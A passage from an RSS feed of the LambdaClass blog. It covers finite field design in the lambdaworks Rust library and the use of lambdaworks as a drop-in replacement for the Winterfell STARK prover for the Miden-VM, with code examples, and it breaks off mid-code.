&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Efficient, but nonconst for the compiler&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let zero = FE::zero();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let one = FE::one();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Const alternatives of the functions are provided,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; but the backend needs to be known at compile time.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; This requires adding a where clause to the function.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let zero = F::ZERO;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let one = F::ONE;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let const_instantiated = FE::from_hex_unchecked(&amp;quot;A1B2C3&amp;quot;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;For many use cases, we can treat these fields as a &lt;code&gt;PrimeField&lt;&#x2F;code&gt; instead of treating them as a generic &lt;code&gt;Field&lt;&#x2F;code&gt;. If field extensions are irrelevant to your use case, &lt;code&gt;PrimeField&lt;&#x2F;code&gt; is the right choice.&lt;&#x2F;p&gt;
&lt;p&gt;You will notice traits are prefixed with &lt;code&gt;Is&lt;&#x2F;code&gt;, so instead of accepting something of the form &lt;code&gt;IsField&lt;&#x2F;code&gt;, you can use &lt;code&gt;IsPrimeField&lt;&#x2F;code&gt; and access more functions. The most relevant is &lt;code&gt;.representative()&lt;&#x2F;code&gt;. This function returns a canonical representation of the element as a number, not as a field element.&lt;&#x2F;p&gt;
&lt;p&gt;If the internal number is in Montgomery form, this function will reverse it.&lt;&#x2F;p&gt;
&lt;p&gt;This allows us to make comparisons where it makes sense. Since fields work like circular lists of elements, order doesn’t make much sense.&lt;&#x2F;p&gt;
&lt;p&gt;If we are in $\mathbb{F_3}$, for example, $4$ may look bigger than $2$, but $4$ is also $1$, and $1$ seems smaller than $2$. The question of “which element is bigger” doesn’t make much sense. This gets even messier if we interpret some numbers as negatives, as other libraries do.&lt;&#x2F;p&gt;
&lt;p&gt;For this reason, comparisons are only allowed when we interpret the &lt;code&gt;FieldElement&lt;&#x2F;code&gt; as a number through the &lt;code&gt;representative()&lt;&#x2F;code&gt; function.&lt;&#x2F;p&gt;
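&lt;p&gt;A tiny sketch of the idea, with plain integers standing in for field elements (illustrative only, not the lambdaworks implementation):&lt;&#x2F;p&gt;

```python
MODULUS = 3  # toy field F_3

def representative(value):
    """Canonical representative in the range 0..MODULUS-1.
    Comparisons between field elements only make sense on this value."""
    return value % MODULUS

# 4 and 1 are the same element of F_3, so asking whether 4 is
# bigger than 2 is meaningless before canonicalizing:
assert representative(4) == representative(1)
# Comparing canonical representatives, however, is well defined:
assert representative(4) != representative(2)
```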
&lt;h3 id=&quot;field-and-elements-serialization-and-deserialization&quot;&gt;Field and Elements: Serialization and Deserialization&lt;&#x2F;h3&gt;
&lt;p&gt;For serialization, we recommend using Serde with bincode. This has given the best results all around while maintaining good usability. By default, the serialization is done in the most compact mode possible and is not human-readable.&lt;&#x2F;p&gt;
&lt;p&gt;To enable a human-readable serialization, where fields are written as strings, the feature &lt;code&gt;lambdaworks-serde-string&lt;&#x2F;code&gt; can be enabled.&lt;&#x2F;p&gt;
&lt;p&gt;Serde is available at all levels of the library. So, if you have a struct containing &lt;code&gt;FieldElement&lt;&#x2F;code&gt;s, you can simply derive a serialization.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;code&gt;FieldElement&lt;&#x2F;code&gt;s also have different algorithms to transform into bytes in the &lt;code&gt;ByteConversion&lt;&#x2F;code&gt; trait. These are &lt;code&gt;from_bytes_le&lt;&#x2F;code&gt;, &lt;code&gt;from_bytes_be&lt;&#x2F;code&gt;, &lt;code&gt;to_bytes_le&lt;&#x2F;code&gt;, and &lt;code&gt;to_bytes_be&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;These smaller conversions to bytes are helpful when doing small tasks like appending data to a transcript but can become cumbersome when you have to serialize complex structures.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;field-and-elements-advanced-usage-extensions-and-internals-deep-dive&quot;&gt;Field and Elements: Advanced usage, Extensions, and Internals deep dive&lt;&#x2F;h3&gt;
&lt;p&gt;Field extensions are used in two scenarios requiring slightly different properties: pairing computations and working with small fields with proof systems.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;pairings&quot;&gt;Pairings&lt;&#x2F;h4&gt;
&lt;p&gt;When doing pairings, a degree $12$ extension is commonly used. This extension is usually created with a tower of extensions, where we make a degree $2$ extension of a degree $3$ extension of a degree $2$ extension of the base field. This is a non-naïve way of building a degree $12$ extension.&lt;&#x2F;p&gt;
&lt;p&gt;For example, we can see in the code:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub type Degree12ExtensionField = QuadraticExtensionField&amp;lt;Degree6ExtensionField, LevelThreeResidue&amp;gt;;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub type Degree6ExtensionField = CubicExtensionField&amp;lt;Degree2ExtensionField, LevelTwoResidue&amp;gt;;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Using quadratic and cubic extensions, we are building the tower of fields. The key design for this to work is in the internal structure of the &lt;code&gt;IsField&lt;&#x2F;code&gt;. A field internally has a &lt;code&gt;BaseType&lt;&#x2F;code&gt; that, in practice, can either be a big integer, which we call &lt;code&gt;UnsignedInteger&lt;&#x2F;code&gt; to enable multiple backends of big integers, or another &lt;code&gt;FieldElement&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;This works nicely for this scenario, but there is another to handle.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;working-with-smaller-fields&quot;&gt;Working with smaller fields&lt;&#x2F;h4&gt;
&lt;p&gt;When working with proving systems that use small fields, such as a STARK over the 32-bit BabyBear field, we need an extension field to keep security from being broken. This is because we need to sample random challenges from a set much larger than the degree of the polynomials involved, so the challenges are drawn from the extension.&lt;&#x2F;p&gt;
&lt;p&gt;But this time, the critical issue is that we will be doing a lot of operations between the field and its subfield. These operations can be performed more efficiently than by doing them naïvely. Think of it as multiplying a complex number by a real one when needed, instead of constantly multiplying full complex numbers even when the imaginary part is 0.&lt;&#x2F;p&gt;
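&lt;p&gt;The complex-number analogy can be made concrete by counting base-field multiplications. This is a hypothetical sketch; lambdaworks resolves the choice through the type system rather than through separate functions like these:&lt;&#x2F;p&gt;

```python
MULS = {"count": 0}  # global counter of base-field multiplications

def base_mul(a, b):
    MULS["count"] += 1
    return a * b

def complex_mul(z, w):
    """Full extension-field product: (a+bi)(c+di), 4 base multiplications."""
    (a, b), (c, d) = z, w
    return (base_mul(a, c) - base_mul(b, d), base_mul(a, d) + base_mul(b, c))

def complex_mul_by_real(z, r):
    """Subfield product: only 2 base multiplications."""
    (a, b) = z
    return (base_mul(a, r), base_mul(b, r))

MULS["count"] = 0
complex_mul((1, 2), (3, 0))
full = MULS["count"]        # 4
MULS["count"] = 0
complex_mul_by_real((1, 2), 3)
cheap = MULS["count"]       # 2
assert (full, cheap) == (4, 2)
```

&lt;p&gt;The specialized subfield operation halves the base-field multiplications here; the savings are what motivate defining separate field-versus-subfield operations.&lt;&#x2F;p&gt;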
&lt;p&gt;We define each &lt;code&gt;Field&lt;&#x2F;code&gt; as a &lt;code&gt;SubField&lt;&#x2F;code&gt; of another &lt;code&gt;Field&lt;&#x2F;code&gt; to solve this issue. An unextended field is defined as a subfield of itself, which is a true statement that you will not notice in practice. When working with an extension, two sets of operations are defined: one for the field and one for the field against its subfield.&lt;&#x2F;p&gt;
&lt;p&gt;The resolution of which operation to use is done with the type system, and so these optimizations are invisible when using the library. When using an operator, Lambdaworks picks the correct operation by itself.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;conclusion&quot;&gt;Conclusion&lt;&#x2F;h2&gt;
&lt;p&gt;Finite Fields are at the core of many proving systems, and having optimized backends is necessary for performance. Lambdaworks has developed its own backend, emphasizing performance and usability. The library also has other features, such as cryptographic primitives and different proof systems. In future blog posts, we will cover these parts, show how to use them, and explain some of the design decisions and the advantages that they may offer.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Lambdaworks as a drop-in replacement for Winterfell to prove the Miden-VM</title>
          <pubDate>Wed, 27 Dec 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/lambdaworks-as-a-drop-in-replacement-for-winterfell/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/lambdaworks-as-a-drop-in-replacement-for-winterfell/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/lambdaworks-as-a-drop-in-replacement-for-winterfell/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&quot;&gt;Lambdaworks&lt;&#x2F;a&gt; is our library for finite fields, elliptic curves, and proof systems. Among them, we have a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;tree&#x2F;main&#x2F;provers&#x2F;stark&quot;&gt;STARK&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;tree&#x2F;main&#x2F;provers&#x2F;plonk&quot;&gt;Plonk&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;tree&#x2F;main&#x2F;provers&#x2F;groth16&quot;&gt;Groth 16&lt;&#x2F;a&gt; provers and we are on the way to having a fully compatible &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;tree&#x2F;main&#x2F;provers&#x2F;cairo&quot;&gt;Cairo prover using STARKs&lt;&#x2F;a&gt;. We want to continue adding new proof systems and polynomial commitment schemes so that users have a library suited to their particular needs and where experimentation is easy.&lt;&#x2F;p&gt;
&lt;p&gt;During the last months, we have been working towards compatibility with &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;facebook&#x2F;winterfell&#x2F;tree&#x2F;main&quot;&gt;Winterfell&lt;&#x2F;a&gt;, a popular general-purpose STARK prover. Polygon uses Winterfell to prove the execution of the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;0xPolygonMiden&#x2F;miden-vm&quot;&gt;Miden-VM&lt;&#x2F;a&gt;, which is a ZK-friendly VM to enable features and benefits that EVM-based L1s and L2s do not currently offer.&lt;&#x2F;p&gt;
&lt;p&gt;Even though the main components are the same, such as the execution trace, the auxiliary trace, Merkle trees for commitments, and the FRI protocol, there are some parts where it was not straightforward to use Lambdaworks as a drop-in replacement for Winterfell. One obstacle is the field backend: Miden was designed to work over the prime field of modulus $2^{64} - 2^{32} + 1$ (known by some as Mini-Goldilocks) and has to use extension fields to achieve cryptographic security, whereas our STARK prover worked with a 252-bit field. In this first part, we focused purely on compatibility and left aside optimizations that could improve performance.&lt;&#x2F;p&gt;
&lt;p&gt;In this post, we will cover the major work we have been doing toward compatibility with Winterfell so that you can replace it in your project if needed. Having different provers with different design choices adds redundancy and robustness, and can help detect bugs.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;fields-and-traces&quot;&gt;Fields and Traces&lt;&#x2F;h2&gt;
&lt;p&gt;To work with Winterfell, we implemented the Lambdaworks field trait for the native Winterfell fields. In other words, we are running our STARK prover with Winterfell fields.&lt;&#x2F;p&gt;
&lt;p&gt;Since Miden works with Mini-Goldilocks, the auxiliary trace and the random challenges drawn by the verifier belong to a field extension. One easy way to deal with this is to have all the elements belong to the extension field, which would add overhead to the elements of the main trace (since they live in the smaller base field).&lt;&#x2F;p&gt;
&lt;p&gt;To solve this issue, we split the trace in two: the main trace uses the small base field, and the auxiliary trace uses the larger extension field.&lt;&#x2F;p&gt;
&lt;p&gt;Moreover, we added some useful generalizations. Since elements of the extension field are often multiplied by elements of the base field, this operation can be specialized. This is similar to what happens with complex numbers when we multiply one by a real number: to compute $2\times (1 + i)$, we distribute and do two real multiplications instead of a naive multiplication with the generic formula $(2 + 0i) \times (1 + i)$.&lt;&#x2F;p&gt;
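&lt;p&gt;As a rough sketch of this saving (toy code, not the Lambdaworks API): in a quadratic extension, multiplying by an embedded base-field element with the generic formula costs four base-field multiplications, while the specialized path costs only two.&lt;&#x2F;p&gt;

```rust
// Toy illustration (not the Lambdaworks API): a quadratic extension
// F_p[i] with i^2 = -1, over a small prime field.
const P: u64 = 97; // toy prime; Miden actually uses 2^64 - 2^32 + 1

fn mul(a: u64, b: u64) -> u64 { (a * b) % P }
fn add(a: u64, b: u64) -> u64 { (a + b) % P }
fn sub(a: u64, b: u64) -> u64 { (a + P - b) % P }

#[derive(Debug, PartialEq, Clone, Copy)]
struct Fp2 { re: u64, im: u64 } // a + b*i

// Generic extension multiplication: four base-field multiplications.
fn mul_fp2(x: Fp2, y: Fp2) -> Fp2 {
    Fp2 {
        re: sub(mul(x.re, y.re), mul(x.im, y.im)),
        im: add(mul(x.re, y.im), mul(x.im, y.re)),
    }
}

// Subfield-aware multiplication: only two base-field multiplications.
fn mul_by_base(c: u64, y: Fp2) -> Fp2 {
    Fp2 { re: mul(c, y.re), im: mul(c, y.im) }
}

fn main() {
    let y = Fp2 { re: 1, im: 1 };
    // 2 * (1 + i): both paths agree, but the specialized one does less work.
    assert_eq!(mul_by_base(2, y), mul_fp2(Fp2 { re: 2, im: 0 }, y));
}
```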
&lt;p&gt;To handle this case, we implemented the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;709&quot;&gt;subfield logic&lt;&#x2F;a&gt;. This allows us to define operations between field elements, with special cases for when a subfield element operates with an element of its parent field. Since it’s just a matter of picking the correct operation at compilation time, the extra logic adds no overhead to the fields, as our benchmarks confirm.&lt;&#x2F;p&gt;
&lt;p&gt;Along with the changes in the fields, we also introduced changes to the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;pull&#x2F;711&quot;&gt;FFT so that it works over extension fields&lt;&#x2F;a&gt;. Now, the interpolation of the auxiliary trace and the computation of the composition polynomial have to work over the larger field.&lt;&#x2F;p&gt;
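&lt;p&gt;The reason the same transform code can serve both fields is that it only ever uses field operations and roots of unity. A toy sketch (a naive size-4 number-theoretic transform, not the Lambdaworks FFT) makes this concrete:&lt;&#x2F;p&gt;

```rust
// Toy sketch (not the Lambdaworks FFT): a size-4 DFT over F_97, where
// 22 is a primitive 4th root of unity (22^2 = 96 = -1 mod 97). Only
// field operations appear, so the same logic works unchanged over a
// base field or an extension field that contains the needed roots.
const P: u64 = 97;
const W: u64 = 22; // primitive 4th root of unity mod 97

fn pow(mut b: u64, mut e: u64) -> u64 {
    let mut acc = 1;
    while e > 0 {
        if e % 2 == 1 { acc = acc * b % P; }
        b = b * b % P;
        e /= 2;
    }
    acc
}

// Naive DFT: evaluate the polynomial with coefficients `c` at the powers of W.
fn dft(c: [u64; 4]) -> [u64; 4] {
    let mut out = [0u64; 4];
    for k in 0..4 {
        for (j, cj) in c.iter().enumerate() {
            out[k] = (out[k] + cj * pow(W, (k * j) as u64)) % P;
        }
    }
    out
}

fn main() {
    // The constant polynomial 1 evaluates to 1 everywhere.
    assert_eq!(dft([1, 0, 0, 0]), [1, 1, 1, 1]);
    // The polynomial x evaluates to the powers 1, W, W^2, W^3.
    assert_eq!(dft([0, 1, 0, 0]), [1, 22, 96, 75]);
}
```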
&lt;h2 id=&quot;winterfell-adapter&quot;&gt;Winterfell adapter&lt;&#x2F;h2&gt;
&lt;p&gt;The Winterfell Adapter transforms a Winterfell AIR (algebraic intermediate representation) into a Lambdaworks AIR.&lt;&#x2F;p&gt;
&lt;p&gt;Internally, it creates a new implementation of the Air trait, using all the configurations from Winterfell. One detail is that constraint evaluation is delegated to the Winterfell implementation, so that someone who already has an AIR defined in Winterfell does not have to redefine it.&lt;&#x2F;p&gt;
&lt;p&gt;To see it working, the following link contains an example of how to generate a proof for the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;tree&#x2F;main&#x2F;winterfell_adapter&quot;&gt;Fibonacci AIR&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;code-and-examples&quot;&gt;Code and Examples&lt;&#x2F;h3&gt;
&lt;p&gt;Let’s see how the Winterfell adapter is used with a simple Air.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;fibonacci-air&quot;&gt;Fibonacci Air&lt;&#x2F;h4&gt;
&lt;p&gt;Suppose you want to run the Lambdaworks prover with a &lt;code&gt;WinterfellFibonacciAIR&lt;&#x2F;code&gt;.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;use winterfell::Air;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;struct WinterfellFibonacciAIR {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;&#x2F; ...&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;impl Air for WinterfellFibonacciAIR {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;&#x2F; ...&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h5 id=&quot;step-1-convert-your-winterfell-trace-table&quot;&gt;Step 1: Convert your Winterfell trace table&lt;&#x2F;h5&gt;
&lt;p&gt;Use the Lambdaworks &lt;code&gt;AirAdapter&lt;&#x2F;code&gt; to convert your Winterfell trace:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let trace = &amp;amp;AirAdapter::convert_winterfell_trace_table(winterfell_trace)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h5 id=&quot;step-2-convert-your-public-inputs&quot;&gt;Step 2: Convert your public inputs&lt;&#x2F;h5&gt;
&lt;p&gt;Create the &lt;code&gt;AirAdapterPublicInputs&lt;&#x2F;code&gt; by supplying your &lt;code&gt;winterfell_public_inputs&lt;&#x2F;code&gt; and the additional parameters required by the Lambdaworks prover:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let pub_inputs = AirAdapterPublicInputs {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    winterfell_public_inputs: AdapterFieldElement(trace.columns()[1][7]),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transition_degrees: vec![1, 1],    &#x2F;&#x2F;&#x2F; The degrees of each transition&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transition_exemptions: vec![1, 1], &#x2F;&#x2F;&#x2F; The steps at the end where the transitions do not apply.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transition_offsets: vec![0, 1],    &#x2F;&#x2F;&#x2F; The size of the frame. This is probably [0, 1] for every Winterfell AIR.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    composition_poly_degree_bound: 8,  &#x2F;&#x2F;&#x2F; A bound on the degree of the composition polynomial, used to choose the number of parts of H(x).&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    trace_info: TraceInfo::new(2, 8),  &#x2F;&#x2F;&#x2F; Your winterfell trace info.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;};&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Note that you might also have to convert your field elements to &lt;code&gt;AdapterFieldElement&lt;&#x2F;code&gt;, as in this case.&lt;&#x2F;p&gt;
&lt;h5 id=&quot;step-3-make-the-proof&quot;&gt;Step 3: Make the proof&lt;&#x2F;h5&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let proof = Prover::prove::&amp;lt;AirAdapter&amp;lt;FibonacciAIR, TraceTable&amp;lt;_&amp;gt;&amp;gt;&amp;gt;(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;amp;trace,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;amp;pub_inputs, &#x2F;&#x2F;&#x2F; Public inputs&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;amp;proof_options,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    StoneProverTranscript::new(&amp;amp;[]),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;code&gt;TraceTable&lt;&#x2F;code&gt; is the Winterfell type that represents your trace table. You can see the &lt;code&gt;examples&lt;&#x2F;code&gt; folder inside this crate to check more examples.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;miden-air&quot;&gt;Miden Air&lt;&#x2F;h3&gt;
&lt;p&gt;Let’s see how it is used with an actual Miden AIR and program.&lt;&#x2F;p&gt;
&lt;p&gt;First, we must compile and run the code to generate a trace. This is done in the same manner as Miden does it.&lt;&#x2F;p&gt;
&lt;p&gt;The whole code is a bit long, but it starts like this:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let fibonacci_number = 16;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let program = format!(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;quot;begin&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        repeat.{}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            swap dup.1 add&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        end&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    end&amp;quot;,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    fibonacci_number - 1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let program = Assembler::default().compile(program).unwrap();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;... &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Some more code goes in the middle until we generate the trace&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let winter_trace = processor::execute(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &amp;amp;program,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    stack_inputs.clone(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    DefaultHost::default(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    *ProvingOptions::default().execution_options(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;After generating the trace from Miden, the real work for the prover starts. The code is not that different from the Fibonacci case; the AIR is more complex, but the adapter abstracts that away from the user.&lt;&#x2F;p&gt;
&lt;p&gt;To generate the proof, we run the following code:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let pub_inputs = AirAdapterPublicInputs {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    winterfell_public_inputs: pub_inputs,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transition_exemptions: vec![2; 182],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    transition_offsets: vec![0, 1],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    trace_info: winter_trace.get_info(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    metadata: winter_trace.clone().into(),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
